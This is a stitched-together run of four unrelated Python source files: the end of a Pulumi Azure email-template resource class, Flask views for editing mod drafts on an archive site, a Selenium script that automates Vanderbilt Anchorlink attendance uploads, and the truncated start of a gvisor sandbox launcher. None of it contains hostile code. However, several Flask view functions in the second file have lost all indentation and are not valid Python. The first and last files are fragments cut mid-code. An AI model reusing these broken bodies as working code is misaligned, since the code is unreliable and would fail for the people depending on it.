        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: EmailTemplateArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a API Management Email Template.
        ## Import
        API Management Email Templates can be imported using the `resource id`, e.g.
        ```sh
        $ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
        ```
        :param str resource_name: The name of the resource.
        :param EmailTemplateArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above, then delegate to
        # _internal_init with a flat keyword form either way.
        resource_args, opts = _utilities.get_resource_args_opts(EmailTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       api_management_name: Optional[pulumi.Input[str]] = None,
                       body: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       subject: Optional[pulumi.Input[str]] = None,
                       template_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        """Validate options/required inputs and register the resource."""
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: all required inputs must be present
            # (unless adopting via opts.urn).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = EmailTemplateArgs.__new__(EmailTemplateArgs)
            if api_management_name is None and not opts.urn:
                raise TypeError("Missing required property 'api_management_name'")
            __props__.__dict__["api_management_name"] = api_management_name
            if body is None and not opts.urn:
                raise TypeError("Missing required property 'body'")
            __props__.__dict__["body"] = body
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if subject is None and not opts.urn:
                raise TypeError("Missing required property 'subject'")
            __props__.__dict__["subject"] = subject
            if template_name is None and not opts.urn:
                raise TypeError("Missing required property 'template_name'")
            __props__.__dict__["template_name"] = template_name
            # Provider-computed outputs start unset.
            __props__.__dict__["description"] = None
            __props__.__dict__["title"] = None
        super(EmailTemplate, __self__).__init__(
            'azure:apimanagement/emailTemplate:EmailTemplate',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api_management_name: Optional[pulumi.Input[str]] = None,
            body: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            subject: Optional[pulumi.Input[str]] = None,
            template_name: Optional[pulumi.Input[str]] = None,
            title: Optional[pulumi.Input[str]] = None) -> 'EmailTemplate':
        """
        Get an existing EmailTemplate resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] description: The description of the Email Template.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] title: The title of the Email Template.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _EmailTemplateState.__new__(_EmailTemplateState)
        __props__.__dict__["api_management_name"] = api_management_name
        __props__.__dict__["body"] = body
        __props__.__dict__["description"] = description
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["subject"] = subject
        __props__.__dict__["template_name"] = template_name
        __props__.__dict__["title"] = title
        return EmailTemplate(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> pulumi.Output[str]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")

    @property
    @pulumi.getter
    def body(self) -> pulumi.Output[str]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[str]:
        """
        The description of the Email Template.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter
    def subject(self) -> pulumi.Output[str]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")

    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> pulumi.Output[str]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")

    @property
    @pulumi.getter
    def title(self) -> pulumi.Output[str]:
        """
        The title of the Email Template.
        """
        return pulumi.get(self, "title")
|
"""Views for archivists to edit and manage mods on the archive"""
from tempfile import NamedTemporaryFile
from flask import Blueprint, render_template, request, url_for, redirect, flash, abort
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired
from sqlalchemy.orm.exc import NoResultFound
from mcarch.app import db
from mcarch.login import login_required
from mcarch.model.mod import Mod, ModVersion, ModFile, ModAuthor, GameVersion
from mcarch.model.mod.draft import DraftMod, DraftModVersion, DraftModFile
from mcarch.model.mod.logs import LogMod, LogModVersion, LogModFile
from mcarch.model.file import upload_b2_file
from mcarch.model.user import roles
from mcarch.util.wtforms import BetterSelect
from wtforms import StringField, SelectField, SelectMultipleField, TextAreaField, BooleanField, \
SubmitField
from wtforms.validators import Length, DataRequired, Email, ValidationError
# Blueprint holding all archivist editing views; templates are looked up
# alongside this module.
edit = Blueprint('edit', __name__, template_folder="templates")
@edit.route('/mods/<slug>/new-draft', methods=['POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_draft(user, slug):
    """Create a new draft copy of the mod identified by `slug` and open it."""
    source_mod = Mod.query.filter_by(slug=slug).first_or_404()
    fresh_draft = source_mod.make_draft(user)
    db.session.add(fresh_draft)
    db.session.commit()
    return redirect(url_for('edit.draft_page', id=fresh_draft.id))
@edit.route('/draft/<id>', methods=['GET'])
@login_required(role=roles.archivist, pass_user=True)
def draft_page(user, id):
    """Render a draft using the same template as a normal mod page."""
    the_draft = DraftMod.query.filter_by(id=id).first_or_404()
    grouped_vsns = the_draft.vsns_by_game_vsn()
    return render_template("mods/mod.html", mod=the_draft,
            vsns_grouped=grouped_vsns, is_draft=True)
@edit.route('/draft/<id>/diff', methods=['GET'])
@login_required(role=roles.archivist, pass_user=True)
def draft_diff(user, id):
    """Show the changes a draft would make relative to its source mod."""
    the_draft = DraftMod.query.filter_by(id=id).first_or_404()
    changes = the_draft.draft_diff()
    return render_template("editor/draft_diff.html", mod=the_draft, diff=changes)
class EditModForm(FlaskForm):
    """Form for creating a mod draft or editing its basic fields."""
    name = StringField('Name', validators=[DataRequired(), Length(max=Mod.name.type.length)])
    website = StringField('Website', validators=[Length(max=Mod.website.type.length)])
    authors = SelectMultipleField("Authors", coerce=int,
            widget=BetterSelect(multiple=True))
    desc = TextAreaField("Description")
    submit = SubmitField('Submit')

    def load_authors(self):
        """Populate the author select choices from the database.

        Must be called before the form is rendered or validated.
        """
        self.authors.choices = [(author.id, author.name)
                for author in ModAuthor.query.all()]

    def get_selected_authors(self):
        """Return the `ModAuthor` rows matching the currently selected ids."""
        selected_ids = self.authors.data
        return ModAuthor.query.filter(ModAuthor.id.in_(selected_ids)).all()
@edit.route('/edit/new-mod', methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod(user):
    """Show the mod-creation form; on valid POST create a draft and open it."""
    form = EditModForm()
    form.load_authors()
    if request.method == 'POST' and form.validate_on_submit():
        draft = DraftMod(
            name=form.name.data,
            website=form.website.data,
            desc=form.desc.data,
            user=user,
        )
        db.session.add(draft)
        db.session.commit()
        return redirect(url_for('edit.draft_page', id=draft.id))
    # GET, or a POST that failed validation: (re)render the form.
    return render_template('editor/edit-mod.html', form=form)
@edit.route("/draft/<id>/edit", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod(user, id):
mod = DraftMod.query.filter_by(id=id).first_or_404()
form = EditModForm(name=mod.name, website=mod.website, desc=mod.desc,
authors=list(map(lambda a: a.id, mod.authors)))
authors = form.load_authors()
if request.method == 'POST':
if form.validate_on_submit():
mod.name = form.name.data
mod.website = form.website.data
mod.desc = form.desc.data
mod.authors = form.get_selected_authors()
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-mod.html', form=form, editing=mod)
class EditVersionForm(FlaskForm):
    """Form for creating or editing one version of a mod draft."""
    name = StringField('Name', validators=[DataRequired(), Length(max=Mod.name.type.length)])
    url = StringField('Web Page', validators=[Length(max=Mod.website.type.length)])
    desc = TextAreaField("Description")
    gamevsns = SelectMultipleField("Game Versions", coerce=int,
            widget=BetterSelect(multiple=True))
    submit = SubmitField('Submit')

    def load_gamevsns(self):
        """Populate the game version select choices from the database.

        Must be called before the form is used, or no versions will be listed.
        """
        self.gamevsns.choices = [(vsn.id, vsn.name)
                for vsn in GameVersion.query.all()]

    def get_selected_gamevsns(self):
        """Return the `GameVersion` rows matching the currently selected ids."""
        selected_ids = self.gamevsns.data
        return GameVersion.query.filter(GameVersion.id.in_(selected_ids)).all()
@edit.route("/draft/<id>/edit/new-version", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod_version(user, id):
mod = DraftMod.query.filter_by(id=id).first_or_404()
form = EditVersionForm()
form.load_gamevsns()
if request.method == 'POST':
if form.validate_on_submit():
vsn = DraftModVersion(
name=form.name.data,
url=form.url.data,
desc=form.desc.data,
game_vsns=form.get_selected_gamevsns(),
)
mod.mod_vsns.append(vsn)
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-version.html', form=form, mod=mod)
@edit.route("/draft/edit/mod-version/<id>", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod_version(user, id):
vsn = DraftModVersion.query.filter_by(id=id).first_or_404()
mod = vsn.mod
form = EditVersionForm(name=vsn.name, url=vsn.url, desc=vsn.desc,
gamevsns=list(map(lambda v: v.id, vsn.game_vsns)))
form.load_gamevsns()
if request.method == 'POST':
if form.validate_on_submit():
vsn.name = form.name.data
vsn.url = form.url.data
vsn.desc = form.desc.data
vsn.game_vsns = form.get_selected_gamevsns()
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-version.html', form=form, mod=mod, editing=vsn)
class EditFileForm(FlaskForm):
    """Form for uploading or editing a file attached to a draft mod version."""
    # The file is optional here; `new_mod_file` adds a `FileRequired` validator
    # before using this form for first-time uploads.
    file = FileField("Mod File")
    desc = TextAreaField("Description")
    page_url = StringField('Web Page', validators=[Length(max=Mod.website.type.length)])
    direct_url = StringField('Direct Download', validators=[Length(max=Mod.website.type.length)])
    redirect_url = StringField('Indirect Download', validators=[Length(max=Mod.website.type.length)])
    submit = SubmitField('Submit')
def upload_file(file, user):
    """Upload a file from a `FileField` to B2 and return the StoredFile object.

    The data is staged through a named temporary file because `upload_b2_file`
    takes a filesystem path rather than a file object.
    """
    with NamedTemporaryFile() as tfile:
        file.save(tfile)
        # Flush Python-level buffers so the uploader, which re-opens the file
        # by name, sees the complete contents. (Also removed a leftover debug
        # print of the filename.)
        tfile.flush()
        return upload_b2_file(tfile.name, file.filename, user)
@edit.route("/draft/<id>/new-file", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod_file(user, id):
vsn = DraftModVersion.query.filter_by(id=id).first_or_404()
mod = vsn.mod
form = EditFileForm()
form.file.validators.append(FileRequired())
if request.method == 'POST':
if form.validate_on_submit():
stored = upload_file(form.file.data, user)
mfile = DraftModFile(
stored = stored,
desc = form.desc.data,
page_url = form.page_url.data,
redirect_url = form.redirect_url.data,
direct_url = form.direct_url.data,
)
vsn.files.append(mfile)
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-file.html', form=form, mod=mod, vsn=vsn)
@edit.route("/draft/edit/mod-file/<id>", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod_file(user, id):
mfile = DraftModFile.query.filter_by(id=id).first_or_404()
vsn = mfile.version
mod = vsn.mod
form = EditFileForm(
desc=mfile.desc,
page_url=mfile.page_url,
redirect_url=mfile.redirect_url,
direct_url=mfile.direct_url,
)
if request.method == 'POST':
if form.validate_on_submit():
if form.file.data:
stored = upload_file(form.file.data, user)
mfile.stored = stored
mfile.desc = form.desc.data
mfile.page_url = form.page_url.data
mfile.redirect_url = form.redirect_url.data
mfile.direct_url = form.direct_url.data
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-file.html', form=form, mod=mod,
vsn=vsn, editing=mfile, curfile=mfile.stored)
|
from typing import List, Dict, Tuple, Set, NamedTuple
import os
import csv
import warnings
import time
import shutil
import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
class Credentials(NamedTuple):
    '''Vanderbilt login pair, typed into the Ping SSO form by `Attendance.login`.'''
    username: str
    password: str
class Event(NamedTuple):
    '''https://anchorlink.vanderbilt.edu/actioncenter/organization/ORGANIZATION/events/calendar/details/ID'''
    # Both fields are interpolated into Anchorlink action-center URLs.
    organization: str
    id: str
# --- Selenium locators -------------------------------------------------------
# Vanderbilt Ping SSO login page elements.
PING_USERNAME_LOCATOR = (By.CSS_SELECTOR, 'input#identifierInput')
PING_PASSWORD_LOCATOR = (By.CSS_SELECTOR, '[name="pf.pass"]')
PING_SIGN_ON_LOCATOR = (By.CSS_SELECTOR, 'a.ping-button')
PING_ERROR_LOCATOR = (By.CSS_SELECTOR, '.ping-error')
PING_NEXT_LOCATOR = PING_SIGN_ON_LOCATOR # same ping button
# Anchorlink main content (only present once logged in).
ANCHORLINK_LOCATOR = (By.CSS_SELECTOR, '[role="main"]')
# Composite "either outcome" selectors, used to wait for whichever element
# shows up first after navigation (success vs. error / relogin prompt).
LOGIN_EVENT_LOCATOR = (By.CSS_SELECTOR, ', '.join([ANCHORLINK_LOCATOR[1], PING_ERROR_LOCATOR[1]]))
RELOG_EVENT_LOCATOR = (By.CSS_SELECTOR, ', '.join([ANCHORLINK_LOCATOR[1], PING_USERNAME_LOCATOR[1]]))
# Swipe-attendance page elements.
SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR = (By.CSS_SELECTOR, 'div.form-control')
ACCESS_CODE_LOCATOR = (By.CSS_SELECTOR, '[name="AccessCode"]')
SWIPE_READY_LOCATOR = (By.CSS_SELECTOR, 'div.alert-info')
SWIPE_SUCCESS_LOCATOR = (By.CSS_SELECTOR, 'div.alert-success')
SWIPE_FAILURE_LOCATOR = (By.CSS_SELECTOR, 'div.alert-danger')
SWIPE_DONE_LOCATOR = (By.CSS_SELECTOR, ', '.join([SWIPE_SUCCESS_LOCATOR[1], SWIPE_FAILURE_LOCATOR[1]]))
CARD_DATA_LOCATOR = (By.CSS_SELECTOR, '[name="cardData"]')
# Report export / My Downloads page elements.
EXPORT_COMPLETE_LOCATOR = (By.CSS_SELECTOR, 'div#flash')
MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'table > tbody > tr:first-child > td:last-child > a:first-child')
# Number of preamble lines before the CSV header row in an exported report.
ATTENDANCE_REPORT_SKIP_N_FIRST_LINES = 6
class ReportLine(NamedTuple):
    '''One data row of the exported attendance report.

    Field names mirror the report's CSV header columns, with underscores in
    place of spaces (see ATTENDANCE_REPORT_FIELD_NAMES).
    '''
    First_Name: str
    Last_Name: str
    Campus_Email: str
    Preferred_Email: str
    Attendance_Status: str
    Marked_By: str
    Marked_On: str
    Comments: str
    Card_ID_Number: str
# Expected CSV header row, reconstructed from ReportLine's field names
# (underscores become spaces); used to sanity-check downloaded reports.
ATTENDANCE_REPORT_FIELD_NAMES = ','.join(list(ReportLine.__annotations__.keys())).replace('_', ' ')
# Maximum seconds for any explicit Selenium wait.
WAIT_TIME: int = 5
class Attendance():
    """Automates Anchorlink event attendance tracking through a web browser.

    Logs in through Vanderbilt's Ping SSO, uploads swiped card codes to an
    event's attendance tracker, and exports/downloads the attendance report.
    """

    def __init__(self, credentials: Credentials, event: Event, debug: bool = False, driver = None):
        self.credentials = credentials
        self.event = event
        self.debug = debug
        self.driver = driver
        self.logged_in = False
        # Card ID numbers already recorded on the event (filled by download()).
        self.previously_uploaded = set()
        # Cached parsed report; invalidated whenever new codes are uploaded.
        self.last_download = None
        if self.driver is None:
            # Headless Chrome by default; a visible browser in debug mode.
            opts = webdriver.ChromeOptions()
            if not debug:
                opts.add_argument('--headless')
                opts.add_argument('--disable-gpu')
                opts.add_argument('--no-sandbox')
                opts.add_argument('--disable-dev-shm-usage')
                opts.add_argument('--single-process')
            # Point Chrome at whichever browser binary is installed on PATH.
            binary_names = ['google-chrome', 'chromium-browser', 'chromium']
            for name in binary_names:
                binary_location = shutil.which(name)
                if binary_location is None:
                    continue
                opts.binary_location = binary_location
                break
            self.driver = webdriver.Chrome(executable_path='/app/.chromedriver/bin/chromedriver', options=opts)
        else:
            # NOTE(review): a caller-supplied driver is discarded and replaced
            # with a fresh Firefox here; behavior preserved as-is, but confirm
            # this is intended rather than `pass`-through of the given driver.
            self.driver = webdriver.Firefox()
        # No implicit waiting -- all waits must be EXPLICIT
        self.driver.implicitly_wait(0)

    def __del__(self):
        # Quit doesn't work in __del__ for Chrome
        if self.driver is not None:
            self.driver.close()

    def is_login_valid(self) -> bool:
        """Return whether the cached login session is still accepted by Anchorlink."""
        if not self.logged_in:
            return False
        self.driver.get("https://anchorlink.vanderbilt.edu/account/login?returnUrl=/")
        # Either the Anchorlink main content appears (still logged in) or the
        # Ping username prompt appears (session expired).
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(RELOG_EVENT_LOCATOR))
        self.logged_in = len(self.driver.find_elements(*ANCHORLINK_LOCATOR)) > 0
        return self.logged_in

    def login(self):
        """Logs in via Vanderbilt Ping SSO or raises an exception if credentials aren't valid"""
        if self.is_login_valid():
            return
        self.driver.get("https://anchorlink.vanderbilt.edu/account/login?returnUrl=/")
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_USERNAME_LOCATOR))
        self.driver.find_element(*PING_USERNAME_LOCATOR).send_keys(self.credentials.username)
        self.driver.find_element(*PING_NEXT_LOCATOR).click()
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_PASSWORD_LOCATOR))
        self.driver.find_element(*PING_PASSWORD_LOCATOR).send_keys(self.credentials.password)
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_SIGN_ON_LOCATOR))
        self.driver.find_element(*PING_SIGN_ON_LOCATOR).click()
        try:
            WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(LOGIN_EVENT_LOCATOR))
        except TimeoutException:
            warnings.warn('Could not locate login event occurrence, maybe Anchorlink or Ping changed some elements?', RuntimeWarning)
        finally:
            # A visible Ping error element means the credentials were rejected.
            if len(self.driver.find_elements(*PING_ERROR_LOCATOR)) > 0:
                raise PermissionError(f'Could not log in: "{self.driver.find_element(*PING_ERROR_LOCATOR).text}"')
            self.logged_in = True

    def raw_upload(self, swiped_card_codes: List[str]) -> List[bool]:
        """Uploads swipe card codes to event attendance and returns an equally-sized list of whether each upload succeeded"""
        self.login()
        def get_access_code() -> str:
            """Gets access code from track attendance page"""
            self.driver.get(f"https://anchorlink.vanderbilt.edu/actioncenter/organization/{self.event.organization}/events/events/trackattendance/{self.event.id}")
            WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR))
            form_control = self.driver.find_element(*SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR)
            return form_control.text
        access_code = get_access_code()
        # Fix: `.text` always returns a string, so the old `is None` check
        # could never fire; treat an empty access code as failure instead.
        if not access_code:
            return [False] * len(swiped_card_codes)
        self.driver.get("https://anchorlink.vanderbilt.edu/swipe")
        access_code_element = self.driver.find_element(*ACCESS_CODE_LOCATOR)
        access_code_element.send_keys(access_code)
        access_code_element.submit()
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(SWIPE_READY_LOCATOR))
        def submit_card(code: str) -> bool:
            """Submit one card code and report whether Anchorlink accepted it."""
            card_data_element = self.driver.find_element(*CARD_DATA_LOCATOR)
            card_data_element.send_keys(code)
            card_data_element.submit()
            WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_any_elements_located(SWIPE_DONE_LOCATOR))
            if len(self.driver.find_elements(*SWIPE_SUCCESS_LOCATOR)) > 0:
                return True
            if len(self.driver.find_elements(*SWIPE_FAILURE_LOCATOR)) > 0:
                return False
            warnings.warn("Could not find swipe success or failure element, assuming success", RuntimeWarning)
            return True
        # Invalidate last download
        self.last_download = None
        return list(map(submit_card, swiped_card_codes))

    def download(self) -> List[ReportLine]:
        """Exports and downloads attendance report. Caches card codes to avoid duplicate uploads."""
        if self.last_download is not None:
            return self.last_download
        self.login()
        # Export attendance
        self.driver.get(f"https://anchorlink.vanderbilt.edu/actioncenter/organization/{self.event.organization}/events/events/exporteventattendance?eventId={self.event.id}")
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(EXPORT_COMPLETE_LOCATOR))
        # Get download URL from user's My Downloads page. Assumes that the newest report is the correct one.
        self.driver.get("https://anchorlink.vanderbilt.edu/actioncenter/downloads")
        WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR))
        # First table, table body, first row, last column, first link
        download_url = self.driver.find_element(*MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR)
        # requests is used here because clicking the link in Selenium would trigger a browser download
        session = requests.Session()
        for c in self.driver.get_cookies():
            session.cookies.set(c['name'], c['value'])
        download = session.get(download_url.get_attribute('href'))
        # Parse download as UTF-8 CSV, skipping the report's preamble
        # (ATTENDANCE_REPORT_SKIP_N_FIRST_LINES lines, the last of which is
        # the header row that we sanity-check below).
        download_lines = download.content.decode('utf-8').splitlines()
        if download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES-1] != ATTENDANCE_REPORT_FIELD_NAMES:
            warnings.warn(f"Report fields do not match: {download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES-1]} != {ATTENDANCE_REPORT_FIELD_NAMES}", RuntimeWarning)
        reader = csv.reader(download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES:])
        report = list(map(lambda line: ReportLine(*line), reader))
        for line in report:
            self.previously_uploaded.add(line.Card_ID_Number)
        self.last_download = report
        return report

    def upload(self, swiped_card_codes: List[str]) -> List[bool]:
        """Uploads swipe card codes to event attendance and returns an equally-sized list of whether each upload succeeded. Checks last download and previous upload success to avoid duplicate uploads."""
        filtered_swipe_card_codes = []
        filtered_swipe_card_codes_indices = []
        for i, code in enumerate(swiped_card_codes):
            # Upload new codes and unique only
            if code not in self.previously_uploaded and code not in swiped_card_codes[:i]:
                filtered_swipe_card_codes.append(code)
                filtered_swipe_card_codes_indices.append(i)
        successes = [True] * len(swiped_card_codes)
        if len(filtered_swipe_card_codes) == 0:
            return successes
        uploaded_successes = self.raw_upload(filtered_swipe_card_codes)
        for i, code, succ in zip(filtered_swipe_card_codes_indices, filtered_swipe_card_codes, uploaded_successes):
            if not succ:
                # Mark every occurrence of this code as failed. BUG FIX: the
                # scan starts at offset `i`, so the enumeration must start at
                # `i` as well -- the old code wrote to `successes[j]` with `j`
                # counted from 0, flagging the wrong positions.
                for j, other_code in enumerate(swiped_card_codes[i:], start=i):
                    if other_code == code:
                        successes[j] = False
            else:
                self.previously_uploaded.add(code)
        return successes
if __name__ == '__main__':
    # Manual smoke test: requires VANDERBILT_PASSWORD in the environment and
    # drives a real (debug, non-headless) browser session against Anchorlink.
    attendance = Attendance(Credentials('puris', os.environ['VANDERBILT_PASSWORD']), Event('designstudio', '5048888'), debug=True)
    # These are not real card numbers
    print(attendance.upload(['796000210', '796000210', '796000210']))
    print(attendance.download())
|
#!/usr/bin/env python3
# Run a command under gvisor, setting environment variables and sharing certain
# directories in read only mode. Specialized for running python, and (for testing)
# bash. Does not change directory structure, for unprivileged operation.
# Contains plenty of hard-coded paths that assume we are running within
# a container.
import argparse
import glob
import json
import os
import subprocess
import sys
import tempfile
# Separate arguments before and after a -- divider.
from itertools import groupby
all_args = sys.argv[1:]
# groupby keyed on "is this the divider" yields alternating runs of
# divider/non-divider tokens; dropping the divider runs leaves up to two
# groups: the args before `--` and the args after it.
all_args = [list(group) for k, group in groupby(all_args, lambda x: x == "--") if not k]
main_args = all_args[0] # args before the -- divider, for this script.
more_args = all_args[1] if len(all_args) > 1 else [] # args after the -- divider
                                                     # to pass on to python/bash.
# Set up options.
parser = argparse.ArgumentParser(description='Run something in gvisor (runsc).')
parser.add_argument('command', choices=['bash', 'python2', 'python3'])
parser.add_argument('--dry-run', '-d', action='store_true',
                    help="print config")
parser.add_argument('--env', '-E', action='append')    # extra NAME=VALUE pairs for the sandbox env
parser.add_argument('--mount', '-m', action='append')  # extra host paths to share read-only
parser.add_argument('--restore', '-r')                 # checkpoint image path to restore from
parser.add_argument('--checkpoint', '-c')              # directory to write a checkpoint image to
parser.add_argument('--start', '-s') # allow overriding the entrypoint
parser.add_argument('--faketime')    # fake clock start, or 'default' for 2020-01-01
# If CHECK_FOR_TERMINAL is set, just determine whether we will be running bash, and
# exit with success if so. This is so if we are being wrapped in docker, it can be
# started in interactive mode.
if os.environ.get('CHECK_FOR_TERMINAL') == '1':
    args = parser.parse_args(main_args)
    exit(0 if args.command == 'bash' else -1)
args = parser.parse_args(main_args)
# Exactly one of these is true, per the `command` choices above.
include_bash = args.command == 'bash'
include_python2 = args.command == 'python2'
include_python3 = args.command == 'python3'
# Basic settings for gvisor's runsc. This follows the standard OCI specification:
# https://github.com/opencontainers/runtime-spec/blob/master/config.md
cmd_args = []  # argv for the sandboxed process; filled in further below.
mounts = [ # These will be filled in more fully programmatically below.
    {
        "destination": "/proc", # gvisor virtualizes /proc
        "source": "/proc",
        # NOTE(review): the OCI spec spells these mount types "proc"/"sysfs"
        # (no leading slash); presumably the gvisor fork in use accepts this
        # form -- confirm before changing.
        "type": "/procfs"
    },
    {
        "destination": "/sys", # gvisor virtualizes /sys
        "source": "/sys",
        "type": "/sysfs",
        "options": [
            "nosuid",
            "noexec",
            "nodev",
            "ro"
        ]
    }
]
preserved = set()  # host paths already bind-mounted read-only (see preserve())
env = [
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "LD_LIBRARY_PATH=/usr/local/lib" # Assumes python version in /usr/local
] + (args.env or [])
settings = {
    "ociVersion": "1.0.0",
    "process": {
        "terminal": include_bash,
        "user": {
            "uid": os.getuid(), # match current user id, for convenience with mounts
            "gid": 0
        },
        "args": cmd_args,
        "env": env,
        "cwd": "/",
    },
    "root": {
        "path": "/", # The fork of gvisor we use shares paths with host.
        "readonly": True # Read-only access by default, and we will blank out most
